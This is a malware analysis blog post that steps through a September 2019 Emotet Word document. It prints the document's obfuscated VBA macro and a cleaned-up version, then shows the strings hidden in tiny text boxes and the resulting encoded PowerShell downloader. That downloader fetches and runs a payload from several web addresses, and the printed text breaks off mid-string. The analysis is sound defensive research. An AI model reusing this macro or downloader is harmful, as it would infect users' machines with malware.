Analysis of a New Emotet Maldoc with VBA Downloader

Summary

Emotet is a modular delivery platform that has consistently dominated the commodity malware threat landscape over the past couple of years. It has evolved from a straightforward banking trojan into a full-fledged malware distribution service, delivering a variety of payloads for other threat actor groups. The U.S. Department of Homeland Security states that Emotet infections cost state and local governments up to $1 million to remediate.

In early June, its operators, known as Mummy Spider or TA542 appear to have taken an extended hiatus until August 22, when the command & control (C&C) infrastructure came back to life and began to update and reestablish contact with compromised hosts. On Monday, September 16 the botnet resumed spamming operations with new malicious documents to deliver updated payloads/binaries.

There has already been significant coverage from multiple sources, and I won’t bother to rehash too much of the overall campaign and operational analysis that has been produced by other researchers. Please check out these resources for some more detailed information:

Upon Emotet’s return, there appears to be limited operational updates, at least considering the extended break and the opportunity the actors had to re-tool. Some notable exceptions appear to be the splitting of the Epoch 1 C&C infrastructure into Epoch 1 and the freshly dubbed, Epoch 3 with new RSA keys; and apparently a new packer for the binary payload.

The new spam campaigns also appear to be delivering two different versions of maldocs to download the stage 1 payload. Some of these are ZIP files that use JavaScript to fetch the binary and others are the more “classic” style that leverage a VBA macro-enabled word document to execute a PowerShell script to download the initial binary. David Ledbetter has already published an excellent blog covering the ZIP>JavaScript style maldoc here:

That analysis inspired me to analyze some aspects of the Word DOC deliveries that may not have not been covered elsewhere, particularly by going in-depth into the DOC>VBA>PowerShell version that has typically consisted of the bulk of Emotet campaigns. Usually when triaging these types of maldocs, I simply extract the payload URLs for indicators of compromise (IOCs) as quickly as possible and move on with the investigation. But, it has been awhile since I’ve taken a look at Emotet, so I was interested in digging a little deeper for any new tactics, techniques, or procedures (TTPs) that could be uncovered with some static analysis of these malicious documents. So, the following section will purely focus on the maldoc itself and some of the sneaky tricks Mummy Spider is using to avoid detection by controls and obfuscate their malicious code. Let’s go.

The Word DOC and how the VBA code is hidden

The sample we will be taking a look at was from September 18, and the same as one mentioned in a blog post over at Malware Traffic Analysis:

  • SHA256: cff8d68e20920ba54a2842961706a6d210ddc344194861f654de469e555259ca

The first thing to note is the new document template presented for the intended victim, prompting them to enable macros in order to view protected content. Of course, this is all lies, and if the User ignores the security warning and macros are enabled, the infection chain will proceed.

New Emotet Template

Now, as noted above, we would typically opt for the easy way to get at the IOCs, using tools such as olevba/ViperMonkey or simply copying out the final PowerShell from an online sandbox. However, for our purposes here, we are mainly interested in an exercise to identify the underlying construction of the maldoc, so we will take the road less traveled on our way to the final PowerShell downloader.

First up, we want to open the Visual Basic editor in Microsoft Word to get our initial look at the VBA code and see what we’re up against.

The maldoc’s VBA project

There are multiple modules here, most of which are completely empty and can be ignored. We filter down to the final two hidden beneath the other layers to find the modules with the actual macro code.

The only two modules with relevant code

The VBA script in these two modules is actually quite short compared to the samples I have encountered in the past with this malware variant. It was previously common for there to be thousands of lines of junk code that needed to be parsed out before the functional code would take shape. Below we see a very manageable 173 lines of code:

Function UUz0RJI()
      On Error Resume Next
   For Each RHiKkiLG In A5M2p7jK
      For Each G75P1US In qJEc7IRb
         Dim GIYjspC, nB9SYV, LPUPL1N
         Dim wcQtYfJ, ZuaMkz, i422qG
         CMCU7SLC = Sqr(imiXhzrE * zBqizFPU)
         Next
      Do
         Dim NV_0VSGS, dYD3M3, RCKlPU
         Dim bfi2D2, XPmfBPs, iXl0wV6d
         iipGpOUw = Hex(cIt0mZ9P * EVw6k9)
   Loop Until lJnXC2 Eqv pI8QsdFp
   Next
Ww_KhOVz = G2wST3 + zG09JQ(ThisDocument.RjQh9O8r + ThisDocument.YjCTu6) + iOcZRt
      On Error Resume Next
   For Each XzfowjXj In zp_dZk
      For Each kKK37jlj In iFNokz
         Dim ACjMki6, YDJ2lwq, qk27CPW
         Dim LEWEN34j, Zkq8Q0, CNERhtN
         iF_Q2R = Sqr(iNY2S0CO * oIol86u)
         Next
      Do
         Dim o8hn3O, Yk9pTD, nupvPCDG
         Dim rYEJFhh, mElhmcvj, ndFX7LK
         sv4aUaY = Hex(RfaHIM * INDTida)
   Loop Until wwAJ96d Eqv F3oQHN
   Next
      On Error Resume Next
   For Each YhwOWG In zfCLM4
      For Each QKaoid3Q In WbRwPX
         Dim WGF6d2G, XwOpl1zO, ulAph_P
         Dim tLPpbqc, VskhKsac, rmciw82
         Xi6OLrb = Sqr(Hz0JGJ * tWbSOE0z)
         Next
      Do
         Dim WncslwCR, YY2uIOT, jfSuDEi
         Dim Ld7bV4, mbMMG1BT, arK_vvT
         H4YoHS = Hex(hjCD9u * tCRlqQa)
   Loop Until wz9OsLI Eqv sEWzE6L
   Next

VXMzL_3u = CreateObject("w" + zG09JQ("inPidormPidorgmPi" + "dortsPidor:PidorWPidorinPid" + "or3Pidor2Pidor_PidorP" + "rPidoroPidorPidorcePidorsPidors")).Create(Ww_KhOVz, Hrmr5j, QNm9jL2, qwVG3L)
      On Error Resume Next
   For Each WWWjLD2Y In iJu_wF2u
      For Each GG7zNa7h In B0N8cTL
         Dim nHUCsc, wwo5Ls, RbjVvIU_
         Dim j8zii6Oj, oEOUtM9t, rQAHH4m
         jzVk9wi = Sqr(QtqqzUC * MmjKmO)
         Next
      Do
         Dim V8pbmT8C, WiQiLv, CvKdqE3
         Dim i6dLHjE, o0sZtof, n8rbwnM
         l8Qkj8 = Hex(Gz6T7L * wjsnCh9)
   Loop Until FsqOG10 Eqv SaWMZv
   Next
End Function
Function zG09JQ(hs_BwF)
      On Error Resume Next
   For Each VjsX6M In iC5iYoMr
      For Each KSGqtMd0 In RprNb9K
         Dim nRE_bsO, Aa0u3KuN, pf67oSY_
         Dim FaisH6nI, wfTj0Iq, biN3ZrF3
         kDs4N1k = Sqr(j8il7c * JY9fmw)
         Next
      Do
         Dim K4jEBBDR, fQmGqYN, s04SZnY5
         Dim wFPfEA9, Ml5Q4U1j, kkRM1V
         iJboIk = Hex(ZWviFtWW * zsA0jHr)
   Loop Until qo5aKOsX Eqv fdTYH1i
   Next
zG09JQ = Replace(hs_BwF, Replace("$$$$P$i$d$$$or$", "$", ""), "")
      On Error Resume Next
   For Each rlot_b In padf9ZdD
      For Each kAzN0lN In mJB56iNs
         Dim ttcWBT, oIPrb1, bVnnCfI
         Dim fwjj9vsP, jPow6_T, jDsLUYA3
         FXk8fah = Sqr(qXibhP5R * kntDa1w)
         Next
      Do
         Dim JL84nnz, PJXYjl, HmK8bGI
         Dim wXUKHsh, b4f6zt, wuJUHHaF
         lovEwi = Hex(W58Lb2c * n2Ozc7)
   Loop Until ULD3P5 Eqv awSicE8
   Next
End Function
Sub autoopen()
      On Error Resume Next
   For Each H6WEbiFW In atJ0U9
      For Each bANiUi4j In ajqhF5
         Dim jOps_U, M5TzaSdT, XplwM4d
         Dim Xm0nP4IR, rB5oUT, PzODXv
         Wm4CzPI = Sqr(TRQE6SA * zYjBQi)
         Next
      Do
         Dim ICnaPN9, bZwVl5Z, BtKYhNXK
         Dim uZVYwI, s9IDSR, f52WfJvT
         YwfZCEY = Hex(BLA9Mjzi * wa47wmiU)
   Loop Until npB8SpSl Eqv CpnYbkk8
   Next
UUz0RJI
      On Error Resume Next
   For Each DtKTGVi In EU1_Jm
      For Each ZzUaAik In XvjPjA
         Dim HwT59GT, KZ4Q5z5, rMGEPkO
         Dim pPwjTSWA, djqAjp, K_i7ma
         ShFitq = Sqr(apkqFl * zlQFJLlZ)
         Next
      Do
         Dim B3W3nVj, q7Qk5Zdf, iFlFo7
         Dim tBK8qj, M2oBOH8, wuBXqr
         RYTbzs8n = Hex(Gw4PrPPK * q2dI8AqM)
   Loop Until KUdNVLBM Eqv kZDb14
   Next
End Sub
Function QNm9jL2()
      On Error Resume Next
   For Each bkDzkriq In X0Fkcszh
      For Each BPWWAZL In DRiQIo
         Dim tr8zMXA, AYT9Kf5J, LswLjz
         Dim i9s871F7, d13WGTYz, uwkHWX
         Djb_pjaS = Sqr(Yi4PqK * V3liztdX)
         Next
      Do
         Dim TllibK3T, JT7zUVT, hGZja9
         Dim dusjSn, Td6CtXW3, F7zJcZlF
         wFKl62Sk = Hex(trU583 * cQuifo2l)
   Loop Until OS6MU57 Eqv QI4FwR
   Next
Set QNm9jL2 = CreateObject(jDpfOwj + zG09JQ(ThisDocument.wN6iMqLL) + uh6wY9Z3)
      On Error Resume Next
   For Each K6iA7F In zKDvSVqq
      For Each ABDid8wf In wiQtjX
         Dim irWDzc8V, Od5h4_, AtcmNb
         Dim tj5UM6j8, h9OliHRz, LcmR6YX
         Cd61Bl = Sqr(RwW68j0 * waKUUaOw)
         Next
      Do
         Dim unazifp, lHN_Hr8, ZR7o7Dc8
         Dim lDrCiLhz, qZRihnuu, hYbYTR
         kXXlms = Hex(BFtzk4C * E_YGST)
   Loop Until rTVmTtN Eqv FhnNwj
   Next
QNm9jL2. _
ShowWindow! _
 = zOG2hYj + RXjfH84 + TUItKNb + Cm8UjOvF + KHGpzAE + Bz2fiAf
      On Error Resume Next
   For Each tTjdK_1 In w3_Msb8
      For Each r7nz4jj In CXqPPu
         Dim RLcMjKCZ, f7_BCA, XvFa890
         Dim l4tnQn4G, LRvkXWf6, BVpn6S
         vPfNnYUh = Sqr(STG7RUY * JsDcDt3u)
         Next
      Do
         Dim Et0wJL, AoWQ2j, z9HEVP2
         Dim B2zciwp, ltYf8u, UaU72f
         o5nT424 = Hex(GVtuj4 * c1VKcA)
   Loop Until L2aRsK Eqv zt3Cnb4
   Next
      On Error Resume Next
   For Each fEh86Nsh In kQu1Aj
      For Each ET9KYC3 In EHNQTk
         Dim uWtMo0, LQi483z, oFwbriE
         Dim ja07YqLn, jKcUHt, RNYNTqvh
         oN3oXwXa = Sqr(t3rTwl * Rwotjsu)
         Next
      Do
         Dim VGSK3KY, SCwr9sP4, aEcs2aM
         Dim CsJ5vR, JHAsTd, piow7i
         OGa9Zcup = Hex(pLMJCa * Dv5vMmk)
   Loop Until tj7OjF Eqv h2_5uYV
   Next
End Function

As usual, we want to immediately look for “Sub autoopen()” as this is the function that will execute on document open if the user has enabled content. The majority of the remaining code is junk, and only exists for anti-analysis purposes. All of the “Hex” and “Sqr” operations are meaningless red herrings and can be deleted. If any variable is initialized and never used, those can be removed as well.

Function UUz0RJI()
Ww_KhOVz = zG09JQ(ThisDocument.RjQh9O8r + ThisDocument.YjCTu6)
VXMzL_3u = CreateObject("w" + zG09JQ("inPidormPidorgmPi" + "dortsPidor:PidorWPidorinPid" + "or3Pidor2Pidor_PidorP" + "rPidoroPidorPidorcePidorsPidors")).Create(Ww_KhOVz, QNm9jL2) 
End Function

Function zG09JQ(hs_BwF)
zG09JQ = Replace(hs_BwF, Replace("$$$$P$i$d$$$or$", "$", ""), "")
End Function

Sub autoopen()
UUz0RJI
End Sub

Function QNm9jL2()
Set QNm9jL2 = CreateObject(zG09JQ(ThisDocument.wN6iMqLL))
QNm9jL2. _
ShowWindow! _
End Function

So clean-up gets us down to about 18 lines of relevant code that actually performs some operation. Unfortunately, none of this looks like PowerShell, so we must circle back to the document and look for more clues. We know there is some way the macro is using these variables to build the final downloader script. A couple clues we have to key in on are the following strings.

  • “ThisDocument.RjQh9O8r”
  • “ThisDocument.YjCTu6”
  • “ThisDocument.wN6iMqLL”
  • “Replace(“$$$$P$i$d$$$or$”, “$”, “”), “”)”

My first guess here was that the “ThisDocument” operations were creating objects and calling them from Class Modules somewhere in the Document itself. The “Replace” string is pretty straightforward and we can expect to do some character substitutions – nothing new for Emotet there. We will see how important these strings are shortly…

That’s not a speck of dust on your monitor

So we jumped back to the document template and deleted the main image. I’m getting older and my eyes aren’t what they used to be, so I almost missed the very tiny dot that was hidden underneath the image. It helped that it was subtly flashing because it was a cursor within a text box! To be exact, there are actually 20 text-boxes measuring .01″ by .01″ all stacked on top of each other.

Text-box properties

I’ve seen a similar tactic like this before, but it was at most 3 boxes and they were clearly visible in the top left corner, not obscured by an image layer. I’m honestly not sure if this is actually new or I simply haven’t seen it before.

Anyways, it is possible to expand these out to get a better look at what is going on:

Remember those “ThisDocument.<VARIABLE>” objects I mentioned?

By taking a peek at the text box properties, we see that most of them are junk. However, there are three of interest that contain longer strings, and they just so happen to match the variable names of the “ThisDocument” objects we identified in the VBA script. One of the strings is crazy long and actually will not display in the text box because it is 10,987 characters long. Still, you can select the whitespace in the text box and copy it out. Spoilers……Prepare for some eyebleed:

poPidorwePidorrsPidorhePidorllPidor -PidorenPidorcoPidord 

wPidoriPidornPidormPidorgPidormPidortPidorsPidor:PidorWPidoriPidornPidor3Pidor2Pidor_PidorPPidorrPidoroPidorcPidorePidorsPidorsPidorSPidortPidoraPidorrPidortPidoruPidorp

JPidorAPidorBPidor6PidorAPidorEPidorcPidorAPidorSPidorgPidorAPidor0PidorAPidorGPidor4PidorAPidorSPidorgPidorAPidor9PidorAPidorCPidorcPidorAPidorbPidorAPidorBPidor2PidorAPidorDPidorMPidorAPidordPidorwPidorBPidorLPidorAPidorDPidorkPidorAPidorMPidorQPidorAPidor3PidorAPidorCPidorcPidorAPidorOPidorwPidorAPidorkPidorAPidorEPidorwPidorAPidorSPidorgPidorBPidor1PidorAPidorEPidorYPidorAPidorcPidorgPidorAPidorzPidorAPidorCPidorAPidorAPidorPPidorQPidorAPidorgPidorAPidorCPidorcPidorAPidorOPidorAPidorAPidorzPidorAPidorDPidorUPidorAPidorJPidorwPidorAPidor7PidorAPidorCPidorQPidorAPidorVPidorQPidorBPidorQPidorAPidorEPidorsPidorAPidorcPidorgPidorBPidor3PidorAPidorGPidorEPidorAPidorUPidorAPidorAPidor9PidorAPidorCPidorcPidorAPidorcPidorQPidorBPidoriPidorAPidorGPidor8PidorAPidorYPidorwPidorBPidorPPidorAPidorFPidorMPidorAPidorQPidorwPidorAPidornPidorAPidorDPidorsPidorAPidorJPidorAPidorBPidoryPidorAPidorHPidorIPidorAPidorNPidorQPidorBPidorLPidorAPidorFPidorIPidorAPidordPidorQPidorBPidor3PidorAPidorDPidorEPidorAPidorPPidorQPidorAPidorkPidorAPidorGPidorUPidorAPidorbPidorgPidorBPidor2PidorAPidorDPidoroPidorAPidordPidorQPidorBPidorzPidorAPidorGPidorUPidorAPidorcPidorgPidorBPidorwPidorAPidorHPidorIPidorAPidorbPidorwPidorBPidormPidorAPidorGPidorkPidorAPidorbPidorAPidorBPidorlPidorAPidorCPidorsPidorAPidorJPidorwPidorBPidorcPidorAPidorCPidorcPidorAPidorKPidorwPidorAPidorkPidorAPidorEPidorwPidorAPidorSPidorgPidorBPidor1PidorAPidorEPidorYPidorAPidorcPidorgPidorAPidorzPidorAPidorCPidorsPidorAPidorJPidorwPidorAPidoruPidorAPidorGPidorUPidorAPidorePidorAPidorBPidorlPidorAPidorCPidorcPidorAPidorOPidorwPidorAPidorkPidorAPidorHPidoroPidorAPidorRPidorQPidorBPidor1PidorAPidorEPidorQPidorAPidoraPidorQPidorBPidorCPidorAPidorEPidorIPidorAPidorMPidorAPidorAPidor9PidorAPidorCPidorcPidorAPidorTPidorgPidorBPidorVPidorAPidorHPidoroPidorAPidorUPidorAPidorBPidorvPidorAPidorGPidorIPidorAPidorQPidorgPidorBPidorCPidorAPidorCPidorcPidorAPidorOPidorwPidorAPidorkPidorAPidorFPidorgPidorAPidordPidorAPidorBPidorfPidorAPidorEPidor0PidorAPidordPidorwPidorBPidorxPidorAPidorDPidor0PidorAPidorJPidorgPidorAPidoroPidorAPidorCPidorcPidorAPidorbPidorgPidorBPidorlPidorAPidorHPidorcPidorAPidorJPidorwPidorAPidorrPidorAPidorCPidorcPidorAPidorLPidorQPidorBPidorvPidorAPidorGPidorIPidorAPidoraPidorgPidorAPidornPidorAPidorCPidorsPidorAPidorJPidorwPidorBPidorlPidorAPidorGPidorMPidorAPidordPidorAPidorAPidornPidorAPidorCPidorkPidorAPidorIPidorAPidorBPidorOPidorAPidorEPidorUPidorAPidordPidorAPidorAPidoruPidorAPidorHPidorcPidorAPidorRPidorQPidorBPidoriPidorAPidorGPidorMPidorAPidorTPidorAPidorBPidorJPidorAPidorGPidorUPidorAPidorTPidorgPidorBPidor0PidorAPidorDPidorsPidorAPidorJPidorAPidorBPidorkPidorAPidorGPidoroPidorAPidorNPidorgPidorBPidorkPidorAPidorGPidor0PidorAPidorcPidorgPidorAPidor9PidorAPidorCPidorcPidorAPidoraPidorAPidorBPidor0PidorAPidorHPidorQPidorAPidorcPidorAPidorAPidor6PidorAPidorCPidor8PidorAPidorLPidorwPidorBPidor0PidorAPidorGPidorgPidorAPidoraPidorQPidorBPidoruPidorAPidorGPidorgPidorAPidordPidorgPidorBPidor1PidorAPidorGPidor8PidorAPidorbPidorgPidorBPidornPidorAPidorGPidor0PidorAPidorZPidorQPidorBPidorkPidorAPidorGPidorkPidorAPidorYPidorQPidorAPidoruPidorAPidorGPidorMPidorAPidorbPidorwPidorBPidortPidorAPidorCPidor8PidorAPidordPidorwPidorBPidorwPidorAPidorCPidor0PidorAPidorYPidorQPidorBPidorkPidorAPidorGPidor0PidorAPidoraPidorQPidorBPidoruPidorAPidorCPidor8PidorAPidorbPidorgPidorAPidoryPidorAPidorGPidorsPidorAPidorZPidorQPidorBPidorlPidorAPidorHPidorAPidorAPidorNPidorwPidorAPidorvPidorAPidorEPidorAPidorAPidoraPidorAPidorBPidor0PidorAPidorHPidorQPidorAPidorcPidorAPidorBPidorzPidorAPidorDPidoroPidorAPidorLPidorwPidorAPidorvPidorAPidorGPidor0PidorAPidorbPidorgPidorBPidorwPidorAPidorGPidorEPidorAPidorcPidorwPidorBPidorhPidorAPidorGPidorwPidorAPidordPidorQPidorBPidoriPidorAPidorGPidor8PidorAPidorbPidorgPidorBPidornPidorAPidorCPidor4PidorAPidorYPidorwPidorBPidorvPidorAPidorGPidor0PidorAPidorLPidorwPidorBPidor3PidorAPidorHPidorAPidorAPidorLPidorQPidorBPidorhPidorAPidorGPidorQPidorAPidorbPidorQPidorBPidorpPidorAPidorGPidor4PidorAPidorLPidorwPidorBPidoruPidorAPidorHPidorMPidorAPidorbPidorQPidorBPidor6PidorAPidorDPidorkPidorAPidorYPidorQPidorBPidor6PidorAPidorDPidorAPidorAPidorMPidorwPidorAPidoryPidorAPidorCPidor8PidorAPidorQPidorAPidorBPidoroPidorAPidorHPidorQPidorAPidordPidorAPidorBPidorwPidorAPidorDPidoroPidorAPidorLPidorwPidorAPidorvPidorAPidorHPidorQPidorAPidorcPidorgPidorBPidor1PidorAPidorGPidor4PidorAPidorZPidorwPidorBPidorhPidorAPidorGPidor4PidorAPidoraPidorAPidorAPidoruPidorAPidorHPidorgPidorAPidorePidorQPidorBPidor6PidorAPidorCPidor8PidorAPidordPidorwPidorBPidorwPidorAPidorCPidor0PidorAPidorYPidorwPidorBPidorvPidorAPidorGPidor4PidorAPidordPidorAPidorBPidorlPidorAPidorGPidor4PidorAPidordPidorAPidorAPidorvPidorAPidorHPidorUPidorAPidorePidorgPidorBPidorxPidorAPidorDPidorUPidorAPidorMPidorAPidorAPidorvPidorAPidorEPidorAPidorAPidoraPidorAPidorBPidor0PidorAPidorHPidorQPidorAPidorcPidorAPidorBPidorzPidorAPidorDPidoroPidorAPidorLPidorwPidorAPidorvPidorAPidorGPidorkPidorAPidorcPidorAPidorBPidor0PidorAPidorGPidorkPidorAPidordPidorgPidorBPidorpPidorAPidorGPidorMPidorAPidoraPidorQPidorBPidoruPidorAPidorGPidorkPidorAPidorLPidorgPidorBPidorjPidorAPidorGPidor8PidorAPidorbPidorQPidorAPidorvPidorAPidorGPidor4PidorAPidorcPidorAPidorBPidorrPidorAPidorHPidorgPidorAPidorLPidorwPidorBPidorqPidorAPidorHPidorcPidorAPidorcPidorAPidorBPidor5PidorAPidorDPidorkPidorAPidorMPidorwPidorAPidor4PidorAPidorCPidor8PidorAPidorQPidorAPidorBPidoroPidorAPidorHPidorQPidorAPidordPidorAPidorBPidorwPidorAPidorHPidorMPidorAPidorOPidorgPidorAPidorvPidorAPidorCPidor8PidorAPidordPidorwPidorBPidor3PidorAPidorHPidorcPidorAPidorLPidorgPidorBPidorjPidorAPidorGPidorUPidorAPidorePidorgPidorBPidorhPidorAPidorGPidorUPidorAPidordPidorgPidorBPidorpPidorAPidorGPidor4PidorAPidorZPidorQPidorBPidornPidorAPidorGPidor8PidorAPidorbPidorgPidorBPidorkPidorAPidorGPidorUPidorAPidorcPidorgPidorAPidoruPidorAPidorGPidorMPidorAPidorbPidorwPidorBPidortPidorAPidorCPidor8PidorAPidorYPidorwPidorBPidorvPidorAPidorGPidor4PidorAPidorZPidorgPidorAPidorvPidorAPidorGPidorYPidorAPidorZPidorAPidorAPidor0PidorAPidorDPidorUPidorAPidorLPidorwPidorAPidornPidorAPidorCPidor4PidorAPidorIPidorgPidorBPidorTPidorAPidorHPidorAPidorAPidorbPidorAPidorBPidorgPidorAPidorEPidorkPidorAPidorVPidorAPidorAPidoriPidorAPidorCPidorgPidorAPidorJPidorwPidorBPidorAPidorAPidorCPidorcPidorAPidorKPidorQPidorAPidor7PidorAPidorCPidorQPidorAPidorVPidorAPidorBPidorkPidorAPidorFPidorgPidorAPidorbPidorgPidorBPidorpPidorAPidorDPidorAPidorAPidorUPidorgPidorAPidor9PidorAPidorCPidorcPidorAPidorZPidorAPidorAPidor0PidorAPidorDPidorcPidorAPidoraPidorQPidorBPidorNPidorAPidorDPidorQPidorAPidorMPidorAPidorAPidornPidorAPidorDPidorsPidorAPidorZPidorgPidorBPidorvPidorAPidorHPidorIPidorAPidorZPidorQPidorBPidorhPidorAPidorGPidorMPidorAPidoraPidorAPidorAPidoroPidorAPidorCPidorQPidorAPidorbPidorwPidorBPidorqPidorAPidorGPidoroPidorAPidorVPidorQPidorBPidorUPidorAPidorGPidor8PidorAPidoraPidorgPidorBPidorCPidorAPidorCPidorAPidorAPidoraPidorQPidorBPidoruPidorAPidorCPidorAPidorAPidorJPidorAPidorBPidorkPidorAPidorGPidoroPidorAPidorNPidorgPidorBPidorkPidorAPidorGPidor0PidorAPidorcPidorgPidorAPidorpPidorAPidorHPidorsPidorAPidordPidorAPidorBPidoryPidorAPidorHPidorkPidorAPidorePidorwPidorAPidorkPidorAPidorFPidorgPidorAPidordPidorAPidorBPidorfPidorAPidorEPidor0PidorAPidordPidorwPidorBPidorxPidorAPidorCPidor4PidorAPidorIPidorgPidorBPidorkPidorAPidorGPidor8PidorAPidordPidorwPidorBPidorOPidorAPidorEPidorwPidorAPidorYPidorAPidorBPidorPPidorAPidorEPidorEPidorAPidorYPidorAPidorBPidorEPidorAPidorGPidorYPidorAPidorYPidorAPidorBPidorpPidorAPidorEPidorwPidorAPidorRPidorQPidorAPidoriPidorAPidorCPidorgPidorAPidorJPidorAPidorBPidorvPidorAPidorGPidoroPidorAPidoraPidorgPidorBPidorVPidorAPidorFPidorQPidorAPidorbPidorwPidorBPidorqPidorAPidorEPidorIPidorAPidorLPidorAPidorAPidorgPidorAPidorCPidorQPidorAPidorcPidorgPidorBPidoryPidorAPidorDPidorUPidorAPidorSPidorwPidorBPidorSPidorAPidorHPidorUPidorAPidordPidorwPidorAPidorxPidorAPidorCPidorkPidorAPidorOPidorwPidorAPidorkPidorAPidorGPidor4PidorAPidorSPidorgPidorBPidorxPidorAPidorHPidorcPidorAPidorOPidorAPidorBPidorYPidorAPidorFPidorEPidorAPidorPPidorQPidorAPidornPidorAPidorEPidoroPidorAPidorQPidorQPidorBPidorBPidorAPidorEPidor4PidorAPidorUPidorQPidorBPidorPPidorAPidorDPidorMPidorAPidorVPidorwPidorAPidornPidorAPidorDPidorsPidorAPidorSPidorQPidorBPidormPidorAPidorCPidorAPidorAPidorKPidorAPidorAPidoroPidorAPidorCPidorYPidorAPidorKPidorAPidorAPidornPidorAPidorEPidorcPidorAPidorZPidorQPidorAPidornPidorAPidorCPidorsPidorAPidorJPidorwPidorBPidor0PidorAPidorCPidor0PidorAPidorSPidorQPidorBPidor0PidorAPidorGPidorUPidorAPidorJPidorwPidorAPidorrPidorAPidorCPidorcPidorAPidorbPidorQPidorAPidornPidorAPidorCPidorkPidorAPidorIPidorAPidorAPidorkPidorAPidorHPidorIPidorAPidorcPidorgPidorAPidor1PidorAPidorEPidorsPidorAPidorUPidorgPidorBPidor1PidorAPidorHPidorcPidorAPidorMPidorQPidorAPidorpPidorAPidorCPidor4PidorAPidorIPidorgPidorBPidorMPidorAPidorGPidorUPidorAPidorbPidorgPidorBPidorHPidorAPidorGPidorAPidorAPidorVPidorAPidorBPidoroPidorAPidorCPidorIPidorAPidorIPidorAPidorAPidortPidorAPidorGPidorcPidorAPidorZPidorQPidorAPidorgPidorAPidorDPidorIPidorAPidorOPidorQPidorAPidor4PidorAPidorDPidorAPidorAPidorNPidorAPidorAPidorpPidorAPidorCPidorAPidorAPidorePidorwPidorBPidorbPidorAPidorEPidorQPidorAPidoraPidorQPidorBPidorhPidorAPidorGPidorcPidorAPidorbPidorgPidorBPidorvPidorAPidorHPidorMPidorAPidordPidorAPidorBPidorpPidorAPidorGPidorMPidorAPidorcPidorwPidorAPidoruPidorAPidorFPidorAPidorAPidorcPidorgPidorBPidorvPidorAPidorGPidorMPidorAPidorZPidorQPidorBPidorzPidorAPidorHPidorMPidorAPidorXPidorQPidorAPidor6PidorAPidorDPidoroPidorAPidorIPidorgPidorBPidorTPidorAPidorFPidorQPidorAPidorYPidorAPidorBPidorBPidorAPidorHPidorIPidorAPidorVPidorAPidorAPidoriPidorAPidorCPidorgPidorAPidorJPidorAPidorBPidoryPidorAPidorHPidorIPidorAPidorNPidorQPidorBPidorLPidorAPidorFPidorIPidorAPidordPidorQPidorBPidor3PidorAPidorDPidorEPidorAPidorKPidorQPidorAPidor7PidorAPidorCPidorQPidorAPidorZPidorAPidorBPidormPidorAPidorHPidorYPidorAPidorNPidorQPidorBPidorqPidorAPidorDPidorUPidorAPidorPPidorQPidorAPidornPidorAPidorGPidor8PidorAPidorbPidorgPidorBPidorYPidorAPidorHPidorAPidorAPidordPidorgPidorBPidorxPidorAPidorCPidorcPidorAPidorOPidorwPidorBPidoriPidorAPidorHPidorIPidorAPidorZPidorQPidorBPidorhPidorAPidorGPidorsPidorAPidorOPidorwPidorAPidorkPidorAPidorGPidorwPidorAPidoraPidorgPidorBPidorqPidorAPidorEPidorEPidorAPidorWPidorAPidorBPidorMPidorAPidorDPidorAPidorAPidorPPidorQPidorAPidornPidorAPidorFPidorUPidorAPidorVPidorwPidorBPidortPidorAPidorHPidorIPidorAPidorcPidorgPidorAPidorxPidorAPidorCPidorcPidorAPidorfPidorQPidorBPidor9PidorAPidorGPidorMPidorAPidorYPidorQPidorBPidor0PidorAPidorGPidorMPidorAPidoraPidorAPidorBPidor7PidorAPidorHPidor0PidorAPidorfPidorQPidorAPidorkPidorAPidorGPidorkPidorAPidordPidorwPidorBPidorRPidorAPidorFPidorkPidorAPidordPidorwPidorBPidorQPidorAPidorDPidor0PidorAPidorJPidorwPidorBPidor3PidorAPidorGPidorgPidorAPidorWPidorAPidorBPidor6PidorAPidorFPidorYPidorAPidorUPidorAPidorBPidorpPidorAPidorCPidorcPidorA

So here we have our code from the three hidden text-boxes, but it still looks like a bunch of gibberish. But wait, do you remember the replace function we identified earlier?

  • “Replace(“$$$$P$i$d$$$or$”, “$”, “”), “”)”

A quick google search for “Pidor” tells me that this is a vulgar Russian slur, and I’m assuming is intended as a charming message for those analyzing the code. I won’t go into much more detail here, but you can google and check out Urban Dictionary for yourself. Anyway, we can do a quick find/replace for “Pidor” and see what remains:

 powershell -encod 
 winmgmts:Win32_ProcessStartup
 JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpA